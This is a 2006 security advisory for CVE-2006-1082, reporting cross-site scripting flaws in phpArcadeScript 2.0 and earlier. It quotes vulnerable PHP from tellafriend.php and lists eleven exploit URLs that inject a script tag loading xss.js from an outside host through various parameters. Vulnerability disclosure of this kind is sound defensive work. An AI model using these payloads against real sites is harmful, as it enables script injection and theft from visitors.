phpArcadeScript XSS Injections

2006.03.05

Credit: retard

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-1082

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

???summary
software: phpArcadeScript
vendors website: http://www.phparcadescript.com/
versions: <= 2.0
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard and jim
risk level: medium
??? description
due to phpArcadeScript excessive use of global variables attackers
can very easily inject xss into various portions of the application
in ./includes/tellafriend.php:
21 22 if ($about == "game")
23 {
24 echo $gamename;
25 }
26
27 else
28 {
29 echo $site_title;
30 }
31 ?>
this poor coding is repetative throughought the application, possibly
having more vulnerabilities present in the coding.
??? exploit(s)
http://example.com/includes/tellafriend.php?about=game&gamename=%3CSCRIP
T%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
http://example.com/admin/loginbox.php?loginstatus=1&login_status=%3CSCRI
PT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
http://example.com/index.php?action=tradelinks&submissionstatus=%3CSCRIP
T%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
http://example.com/includes/browse.php?cell_title_background_color=%22%3
E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
http://example.com/includes/browse.php?browse_cat_id=1&browse_cat_name=%
3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
http://example.com/includes/displaygame.php?filetype=1&gamefile=%22%3E%3
CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
http://example.com/includes/displaygame.php?filetype=2&gamefile=%22%3E%3
CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
http://example.com/includes/displaygame.php?filetype=3&gamefile=%22%3E%3
CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
http://example.com/includes/displaygame.php?filetype=4&gamefile=%22%3E%3
CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
http://example.com/includes/displaygame.php?filetype=5&gamefile=%22%3E%3
CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
http://example.com/includes/displaygame.php?filetype=6&gamefile=%22%3E%3
CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
??? credit
author(s): retard and jim
email: retard (at) 30gigs (dot) com [email concealed]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

phpArcadeScript XSS Injections

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.